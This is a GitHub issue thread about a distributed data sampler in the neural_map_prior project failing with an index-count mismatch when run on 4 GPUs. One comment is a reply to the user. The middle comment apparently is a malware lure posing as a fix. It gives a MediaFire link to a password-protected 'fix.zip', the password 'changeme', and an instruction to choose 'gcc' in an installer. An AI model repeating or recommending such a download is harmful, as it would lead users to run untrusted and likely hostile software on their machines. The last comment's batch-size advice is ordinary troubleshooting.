### ISSUE TITLE
Issues related to data samplers

### ISSUE THREAD

**Issue by SherLockLi99** [Tsinghua-MARS-Lab/neural_map_prior#20]
Hi, I used 4 GPUs for the test, but it resulted in a mismatch between self.num_samples and the number of indices in the sampler, how should I solve this problem?
Traceback (most recent call last):
  File "./tools/test.py", line 267, in <module>
    main()
  File "./tools/test.py", line 243, in main
    outputs = multi_gpu_test(model, data_loader, args.tmpdir,
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/mmdet/apis/test.py", line 95, in multi_gpu_test
    for i, data in enumerate(data_loader):
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 359, in __iter__
    return self._get_iterator()
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 305, in _get_iterator
    return _MultiProcessingDataLoaderIter(self)
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 944, in __init__
    self._reset(loader, first_iter=True)
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 975, in _reset
    self._try_put_index()
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 1209, in _try_put_index
    index = self._next_index()
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 512, in _next_index
    return next(self._sampler_iter)  # may raise StopIteration
  File "/home/hwt/anaconda3/envs/npn/lib/python3.8/site-packages/torch/utils/data/sampler.py", line 226, in __iter__
    for idx in self.sampler:
  File "/home/hwt/network/neural_map_prior/tools/data_sampler.py", line 40, in __iter__
    assert len(indices) == self.num_samples, (len(indices), self.num_samples)
AssertionError: (752, 1504)
GeoDistributedSamplerGeoDistributedSamplerGeoDistributedSampler no shuffleno shuffleno shuffle

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abbyxxn** [comment]
It seems like you need to adjust the [batch size](https://github.com/Tsinghua-MARS-Lab/neural_map_prior/blob/7206481bddf5c2d4257dea09ac3be551eaf6a3fd/project/configs/neural_map_prior_bevformer_30m_60m.py#L108) for the map tile configuration as well. I'm using 8 GPUs, and the batch size is 8. Since you're using 4 GPUs, the batch size should be 4.
